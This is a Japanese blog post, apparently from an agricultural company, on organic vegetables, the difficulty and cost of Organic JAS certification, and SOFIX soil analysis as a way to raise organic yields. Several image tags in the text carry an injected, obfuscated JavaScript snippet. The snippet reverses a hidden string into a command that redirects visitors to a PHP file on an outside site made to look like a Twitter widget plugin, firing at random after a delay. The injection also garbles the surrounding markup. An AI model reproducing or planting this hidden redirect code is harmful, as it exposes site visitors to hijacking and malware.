SOFIXと有機野菜

安心・安全な野菜とは?

近年、原発の事故や異物混入事件の頻発により、消費者の食の安全に対する意識が高まっています。
どこで加工された食品か、どこで水揚げされた水産物か、どういう素材が使われているかなど消費者の目はどんどん厳しくなってきています。$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and.com/wp-content/uploads/2016/07/1468889935652-e1468895769749.jpg”>$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and.com/wp-content/uploads/2016/07/1468889935652-e1468895769749.jpg” alt=”1468889935652″ width=”149″ height=”162″ />野菜や果物といった青果物も例外ではなく、産地はどこか、生産者の名前、農薬の使用量といった情報を開示しているスーパーマーケットや青果店も増えてきています。ところで、安心・安全な野菜とはどういう野菜なのでしょうかおそらく、農薬は体に悪い、と思っておられるのではないでしょうか。そして、国産は安心・安全だというイメージを皆さんお持ちと思います。「有機野菜」がその1つの答えといえます。しかし、日本の有機野菜には大きな課題があります。

日本の有機野菜「有機JAS」

日本で有機野菜といえば必ず「有機JAS」というラベルがついています。野菜に「有機」、「オーガニック」など、有機栽培に類する表示をするためには、農場を農林水産省の登録を受けた登録認証機関により有機JASの格付け審査に合格する必要があるという制度です。この審査基準が非常に厳しいため有機JAS認証を受けてる生産者さんや農場はとても少ないのが現状です。
また、有機JASの野菜は一般的な野菜の2倍から3倍と非常に高価です。これでは、私たち庶民にとっては高根の花ですよね。価格が高い理由は、認証を受けている生産者さんが限られているため、有機野菜自体の希少性が高いことが挙げられます。もう1つの理由は、JAS有機認証を受けている農場での収穫量が少ないことです。なぜ収穫量が少ないかというと、肥料が十分でないことに起因する生育不良と、農薬を使わないために虫食いや病気によって出荷できないB品が大量に生産されることが原因になります。$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and.com/wp-content/uploads/2016/07/dreamstime_xs_61190140.jpg”>$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and.com/wp-content/uploads/2016/07/dreamstime_xs_61190140-300×199.jpg” alt=”h” width=”300″ height=”199″ />
天候や生産者さんの腕にもよりますが、一般的な農法での収量の半分くらいになってしまうといわれています。アメリカでは、オーガニックの市場が大きく、スーパーマーケットのオーガニックコーナーは日本のそれとは比べ物にならないほど広く取られています。オーガニック専門の大型スーパーもあり、一般的な野菜よりも20~30%高い程度の値段で売られています。そのため、オーガニック野菜は広く流通しているため大きな市場となっています。

SOFIXで有機でも収量増を

有機野菜を日本でアメリカ並みに流通させるには、やはり、価格をアメリカ並みの水準に引き下げる必要があります。そのためには、有機野菜の流通量を増やさなくてはなりません。有機野菜を生産する生産者と作付け面積を増やすことがまず考えられますが、これは簡単ではありません。上述したように、有機JASに認定されるには、非常に厳しい審査を通る必要があります。このハードルが高すぎるために、2000年に始まった有機JASの認証制度下において有機農業生産者は全生産者の1%以下(約0.2%)に留まっています。作付け面積でも同様です。$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and.com/wp-content/uploads/2016/07/5621deba8a18b839c7a4321764bb05e8.png”>$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and.com/wp-content/uploads/2016/07/5621deba8a18b839c7a4321764bb05e8-300×225.png” alt=”スライド1″ width=”300″ height=”225″ />16年かけてこの数字です。現状のままでは劇的に増えることは考えにくいといえます。
有機農業生産者を増やすとともに、今有機農業での生産を上げるツールこそがSOFIXです。SOFIX分析に基づいて、土壌を改良すれば、慣行農業並みかそれ以上に収量を増やすことができ、さらに病気にも強くなるという事例をたくさん見てきました。そして、その効果は一時的なものでなく、年々収量や生産物の品質が上がっていくのです。有機農業の課題である収量減と安定性のなさがSOFIXによって解決できます。

さらに高付加価値な野菜の安定供給を

現在、日本には、一般的に知られている農作物の栽培基準として、「慣行栽培基準」、「特別栽培基準」、「有機JAS基準」という3つの基準があります。慣行栽培基準とは、普通の栽培方法で生産された農作物となります。特別栽培基準とは、都道府県によって名前や基準が異なることがありますが、多くは都道府県が設定した化学合成農薬と化学肥料を半分に削減した農作物となります。有機JASは上述した通りです。
特別栽培基準から有機JAS基準へのステップが非常に高いのが実情です。アグリジャパンでは、この間に「化学合成農薬50%減、無化学肥料」という基準で「Loveland基準」というオリジナル規格の設定を考えています。さらには、「無農薬、無化学肥料で、最高の土壌で栽培された農産物」という有機JASよりもさらにレベルの高い「S-Loveland規格」という規格も設定する予定です。
アグリジャパンでは、SOFIXを導入することで農産物に新たな価値を付与し、販売店や消費者の皆様にも安心・安全な農産物をわかりやすい形でお届けすることを目指しています。

【SOFIXについてもっと詳しく知りたい方はこちら】

http://sofixagri.com/